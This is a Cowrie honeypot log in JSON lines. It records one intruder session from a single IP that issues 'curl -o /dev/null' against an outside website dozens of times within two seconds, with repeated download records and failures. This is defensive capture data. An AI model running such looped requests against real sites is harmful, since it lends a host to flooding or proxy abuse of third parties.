{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.482961Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.488285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.488931Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.516093Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.526995Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.527674Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.565231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.565953Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.613195Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.613901Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.652537Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.653240Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.690696Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.691408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.729054Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.729872Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.773570Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.776507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.814945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.815765Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.853817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.854622Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.903370Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.904205Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.952546Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.953245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.977604Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.994374Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.995823Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.018547Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.053923Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.054975Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.092157Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.093123Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.131661Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.132520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.169977Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.170835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.209533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.210526Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.247770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.248642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.260990Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.287300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.288217Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.325581Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.326417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.365727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.367007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.391605Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.406125Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.406863Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.454652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.455638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.479920Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.493425Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.497529Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.498383Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.646036Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.679539Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.680412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.690341Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.703272Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.719688Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.721049Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.744949Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.759686Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.760517Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.799514Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.800364Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.862749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.863649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.870300Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.905505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.906485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.919672Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.944328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.945394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:48.984370Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.985507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:48.989516Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.016726Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.072811Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.073703Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.113019Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.113874Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.153814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.154955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.192522Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.193278Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.231082Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.231859Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.269959Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.272523Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.273292Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.314330Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.315164Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.355442Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.356256Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.393344Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.393970Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.431176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.431797Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.438240Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.480523Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.481361Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.518652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.519554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.558824Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:49.559598Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:49.597312Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
